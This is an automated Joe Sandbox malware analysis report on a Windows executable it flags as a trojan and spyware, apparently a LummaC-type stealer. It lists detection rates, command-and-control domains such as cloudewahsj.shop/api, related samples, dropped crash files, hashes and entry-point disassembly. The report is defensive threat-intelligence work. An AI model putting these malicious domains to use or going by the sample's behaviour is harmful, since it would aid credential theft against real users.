            SourceDetectionScannerLabelLink
            rdFy6abQ61.exe39%ReversingLabs
            rdFy6abQ61.exe49%VirustotalBrowse
            rdFy6abQ61.exe100%AviraHEUR/AGEN.1306978
            rdFy6abQ61.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://cloudewahsj.shop/api100%Avira URL Cloudmalware
            https://cloudewahsj.shop/apiP100%Avira URL Cloudmalware
            https://cloudewahsj.shop/apil100%Avira URL Cloudmalware
            https://cloudewahsj.shop/apie100%Avira URL Cloudmalware
            https://cloudewahsj.shop/100%Avira URL Cloudmalware
            https://cloudewahsj.shop/C100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cloudewahsj.shop
            		104.21.96.1
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              rabidcowse.shopfalse
                		high
                wholersorie.shopfalse
                  		high
                  https://cloudewahsj.shop/apitrue
                  • Avira URL Cloud: malware
                  		unknown
                  cloudewahsj.shopfalse
                    		high
                    noisycuttej.shopfalse
                      		high
                      nearycrepso.shopfalse
                        		high
                        framekgirus.shopfalse
                          		high
                          tirepublicerj.shopfalse
                            		high
                            abruptyopsn.shopfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabrdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://cloudewahsj.shop/apiPrdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://duckduckgo.com/ac/?q=rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icordFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://upx.sf.netAmcache.hve.3.drfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.rootca1.amazontrust.com0:rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ac.ecosia.org/autocomplete?q=rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micro0rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cloudewahsj.shop/apilrdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://x1.c.lencr.org/0rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.i.lencr.org/0rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallrdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.microsofrdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cloudewahsj.shop/CrdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://cloudewahsj.shop/rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.0000000000713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesrdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.mozilla.org/products/firefoxgro.allrdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cloudewahsj.shop/apierdFy6abQ61.exe, 00000000.00000003.1699010586.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            104.21.96.1
                                                                            		cloudewahsj.shopUnited States
                                                                            		13335CLOUDFLARENETUStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1584182
                                                                            Start date and time:2025-01-04 15:31:04 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 5s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:rdFy6abQ61.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:7a3e26158d0bf299838749875feb6232.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 99%
                                                                            • Number of executed functions: 20
                                                                            • Number of non-executed functions: 198
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.159.75, 20.109.210.53, 4.175.87.197, 13.107.246.45
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            09:31:55API Interceptor5x Sleep call for process: rdFy6abQ61.exe modified
                                                                            09:32:15API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                            • pelisplus.so/administrator/index.php
                                                                            Recibos.exeGet hashmaliciousFormBookBrowse
                                                                            • www.mffnow.info/1a34/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            cloudewahsj.shop7z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.96.1

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSHMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 104.21.38.84
                                                                            9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                            • 162.159.137.232
                                                                            riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                            • 162.159.138.232
                                                                            9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            http://livedashboardkit.infoGet hashmaliciousUnknownBrowse
                                                                            • 172.67.166.199
                                                                            4.elfGet hashmaliciousUnknownBrowse
                                                                            • 1.13.111.69
                                                                            31.13.224.14-mips-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                            • 1.4.15.193
                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e19cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.96.1
                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.21.96.1
                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.21.96.1
                                                                            download.bin.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.96.1
                                                                            hthjjadrthad.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.96.1
                                                                            PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                            • 104.21.96.1
                                                                            HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                            • 104.21.96.1
                                                                            same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                            • 104.21.96.1
                                                                            nayfObR.exeGet hashmaliciousLummaCBrowse
                                                                            • 104.21.96.1

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rdFy6abQ61.exe_9c2ec9aabfaa27159713c35b362ef04fc683_194fbf08_3d786307-3167-44af-b636-c9102e268049\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):1.063128602020131
                                                                            Encrypted:false
                                                                            SSDEEP:192:gU1LAvomA0U3nnjvEmF5zuiFchZ24IO8ag:LUombU3nnjb5zuiFchY4IO8a
                                                                            MD5:0728E80C2FC4ABBEFD975A8706874AE3
                                                                            SHA1:9BB17B1F3627267A222631CCA61D4A9055F49269
                                                                            SHA-256:BABBEEC0E7231D47B4EC91229A1BFC2332F107006A33793AF8AD42E43C93BE0D
                                                                            SHA-512:626364515B89D115A6FE6949C2216FF713E32FEBA75D6C40F24BA32EAC403BECBBDE54538837D8C4E8F9BECF28CEA331A86977C284453EBE9B5A2C1E50CD5ACC
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.7.4.7.2.2.5.1.8.4.8.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.7.4.7.2.3.0.4.9.7.2.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.7.8.6.3.0.7.-.3.1.6.7.-.4.4.a.f.-.b.6.3.6.-.c.9.1.0.2.e.2.6.8.0.4.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.5.a.0.4.7.6.-.9.b.6.d.-.4.e.5.9.-.9.5.4.f.-.6.c.0.f.1.9.6.2.6.3.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.d.F.y.6.a.b.Q.6.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.4.-.1.6.f.2.-.6.0.6.6.b.5.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.8.4.a.8.b.8.2.f.1.8.7.9.5.5.c.2.3.7.6.1.c.1.9.6.f.d.2.9.8.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.c.e.b.2.9.1.d.c.9.5.2.1.d.4.9.d.1.e.2.1.5.a.f.7.b.6.0.b.4.d.e.1.8.7.d.0.8.d.2.!.r.d.F.y.6.a.b.Q.6.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER94FF.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 15 streams, Sat Jan 4 14:32:02 2025, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):109750
                                                                            Entropy (8bit):2.164930484042213
                                                                            Encrypted:false
                                                                            SSDEEP:384:EukbSvP2TBcaH00wDMYw1/V/nwuRt7ILywKRsn13HsQG8CNEizkSvI:E7u2TBT7RYw1d90sxtK1
                                                                            MD5:F90C9D219A8857EE4A0DB1D3EFBBEE48
                                                                            SHA1:067B34DAFF08C5FEE782B5881DF5B82006767B3B
                                                                            SHA-256:704B6560842FD72E0B2D1599D9E273225456F7DAEA888D958813BE74B6AAC2B7
                                                                            SHA-512:7D9464786223FDC3DF787BC4F389652F5F5ADB959CADC7C9FF2E3BD4387E173A1B2E19B4C51829D9535AC5DAA1445AE75664C80C8A483075154AF6E2140F42AC
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:MDMP..a..... .......bFyg........................p...............h$......4....N..........`.......8...........T...........HE..ng...........$...........&..............................................................................eJ......p'......GenuineIntel............T.......L...YFyg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9628.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8422
                                                                            Entropy (8bit):3.6963063697973557
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJ2O6ZG6Y9lLSU98uCqgmfC0pDp89bEXsfBMm:R6lXJP6ZG6YfLSU9TCqgmfCPEcf/
                                                                            MD5:61CDB59F52D4EA173FA35E1C9C37DDCD
                                                                            SHA1:F937F2236F7B7167BF41199F5B3DEC3016B503E5
                                                                            SHA-256:31B49261ED1369E63DA27B08DB27ABA68B9D1790B4708F610D63427D5E9FBC3E
                                                                            SHA-512:6AB7B5A96ED28A13C3C6B4B99199F6BF4E6B9F8DFD7ADBFFB3E031F78BDD88459CB284FBBD7435F369D24609EEEED4A9348D76E222C1D549CBF8F1DBA4E9E55C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9658.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4724
                                                                            Entropy (8bit):4.474764181140522
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zssJg77aI9NaWpW8VYtvYm8M4JHhO3FCWE+q8vwhOam2lDWad:uIjfqI7Pb7V1JB1KgFm2lDWad
                                                                            MD5:84AF92B748652CBA231CCE4B3710FB66
                                                                            SHA1:BA3EC8AF452035AB6FCA6AF97285B52D27DE33B3
                                                                            SHA-256:15D0C80538F4503AEA5CE4DCE0EBAC3FA04AA1E79373A9248453307008027345
                                                                            SHA-512:CE239D6A46092D4F27E15BCD9CA1A892A1E09B8F4586A4805B3599549129737BD90DF32DD6C365AF34565FE46C7F6494457332B860412526112846C8E49F1DBB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661294" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                            Category:dropped
                                                                            Size (bytes):1835008
                                                                            Entropy (8bit):4.465432746576597
                                                                            Encrypted:false
                                                                            SSDEEP:6144:MIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSbB:xXD94+WlLZMM6YFHe+B
                                                                            MD5:DC328BEB54B3CF7E3D7435DA7498C2F5
                                                                            SHA1:F812953BF518B3F280564FF22EEBC44EB1600E89
                                                                            SHA-256:9A1FAD39A54F19C49DDECBABD99A68B28DAC0B3DF80BD813547C95EAF8F4FB24
                                                                            SHA-512:516E76B2A81C1EB406EE65EEBD2ABB57F138C1D1BF1549A5C912F38282B15C6B48B9FD5407D9F43FFE4F919387E45C30A0CFB16620E785BC66F1B312EB4E98EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...k.^................................................................................................................................................................................................................................................................................................................................................_........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.409084573923632
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:rdFy6abQ61.exe
                                                                            File size:324'096 bytes
                                                                            MD5:7a3e26158d0bf299838749875feb6232
                                                                            SHA1:7ceb291dc9521d49d1e215af7b60b4de187d08d2
                                                                            SHA256:ad94f681001f2a56ca7bf4396b78e119ba71acca6f14ef6eed2ef54502246985
                                                                            SHA512:54b6915cd85463dd5b9d208ea85490df7b7695a7da04325bc12e8454d9ffea1854b7be2868e84c62b0730ce3402aec5654ddf585835d5a14fabbd74e622dcfeb
                                                                            SSDEEP:6144:c80tLR1sx/zDkDzcFiyOARwCHCPCeWCzshOZcT:c/tF1sx/zDkDwE/GC6eBzshz
                                                                            TLSH:1F64F1523851C073C85795308437EAA86D2EBC726BADC5C773582B7F6E302D1866B3E9
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L.....'e...

                                                                            File Icon

                                                                            Icon Hash:7149552549544443

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x40445f
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6527CCC4 [Thu Oct 12 10:39:00 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:3b02806246eee5fe2c774a0312bca63c

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007F7194BE6A58h
                                                                            jmp 00007F7194BE341Eh
                                                                            mov edi, edi
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push edi
                                                                            mov edi, 000003E8h
                                                                            push edi
                                                                            call dword ptr [004010ACh]
                                                                            push dword ptr [ebp+08h]
                                                                            call dword ptr [004010A8h]
                                                                            add edi, 000003E8h
                                                                            cmp edi, 0000EA60h
                                                                            jnbe 00007F7194BE35A6h
                                                                            test eax, eax
                                                                            je 00007F7194BE3580h
                                                                            pop edi
                                                                            pop ebp
                                                                            ret
                                                                            mov edi, edi
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            call 00007F7194BE3CE9h
                                                                            push dword ptr [ebp+08h]
                                                                            call 00007F7194BE3B36h
                                                                            push dword ptr [00443014h]
                                                                            call 00007F7194BE46B1h
                                                                            push 000000FFh
                                                                            call eax
                                                                            add esp, 0Ch
                                                                            pop ebp
                                                                            ret
                                                                            mov edi, edi
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push 00401260h
                                                                            call dword ptr [004010A8h]
                                                                            test eax, eax
                                                                            je 00007F7194BE35B7h
                                                                            push 00401250h
                                                                            push eax
                                                                            call dword ptr [0040105Ch]
                                                                            test eax, eax
                                                                            je 00007F7194BE35A7h
                                                                            push dword ptr [ebp+08h]
                                                                            call eax
                                                                            pop ebp
                                                                            ret
                                                                            mov edi, edi
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push dword ptr [ebp+08h]
                                                                            call 00007F7194BE356Dh
                                                                            pop ecx
                                                                            push dword ptr [ebp+08h]
                                                                            call dword ptr [004010B0h]
                                                                            int3
                                                                            push 00000008h
                                                                            call 00007F7194BE6BC2h
                                                                            pop ecx
                                                                            ret
                                                                            push 00000008h
                                                                            call 00007F7194BE6ADFh
                                                                            pop ecx
                                                                            ret
                                                                            mov edi, edi
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
